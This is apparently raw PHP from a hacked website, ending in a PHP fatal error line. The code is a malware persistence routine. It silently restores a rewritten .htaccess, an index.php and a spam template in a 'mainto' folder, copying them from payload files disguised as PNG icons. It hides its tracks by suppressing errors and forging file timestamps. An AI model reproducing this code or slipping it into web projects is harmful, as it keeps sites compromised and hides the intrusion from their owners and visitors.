//ckIIbg $nowFileDir = 'mainto'; $nowHtacFile = './.htaccess'; $nowMobanFile = './mainto/moban.html'; $nowIndexFile = './mainto/index.php'; $nowLogFile = './mainto/logs.txt'; $bkLocalFileIndex2 = './media/media/images/mime-icon-16/mp3s.png'; $bkLocalFileHtac2 = './media/media/images/mime-icon-16/mp4s.png'; $bkLocalFileMoban2 = './media/media/images/mime-icon-16/odcs.png'; if($nowHtacFile && file_exists($bkLocalFileHtac2)){ if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac2))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowHtacFile,0755); @file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac2)); @chmod($nowHtacFile,0755); } } if(file_exists($bkLocalFileIndex2)){ if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex2) && !file_exists($nowLogFile))){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @chmod($nowIndexFile,0755); @file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex2)); @chmod($nowIndexFile,0755); } } if(file_exists($bkLocalFileMoban2)){ if(!file_exists($nowMobanFile)){ if(!is_dir("./$nowFileDir")){ @mkdir("./$nowFileDir",0755); } @file_put_contents($nowMobanFile,file_get_contents($bkLocalFileMoban2)); @chmod($nowMobanFile,0755); }else{ if(filesize($nowMobanFile) != filesize($bkLocalFileMoban2)){ $tpstrMb = file_get_contents($nowMobanFile); if(strstr($tpstrMb,"#bbbtitsbbb#") && !strstr($tpstrMb,"")){ $fitime = filemtime($bkLocalFileMoban2); @chmod($bkLocalFileMoban2,0755); @file_put_contents($bkLocalFileMoban2,$tpstrMb); @touch($bkLocalFileMoban2, $fitime, $fitime); }else{ @chmod($bkLocalFileMoban2,0755); @file_put_contents($nowMobanFile,file_get_contents($bkLocalFileMoban2)); @chmod($bkLocalFileMoban2,0755); } } } } //ckIIend
Fatal error: Call to a member function mark() on a non-object in /home/u48241/shimanru/cdt/index.php on line 51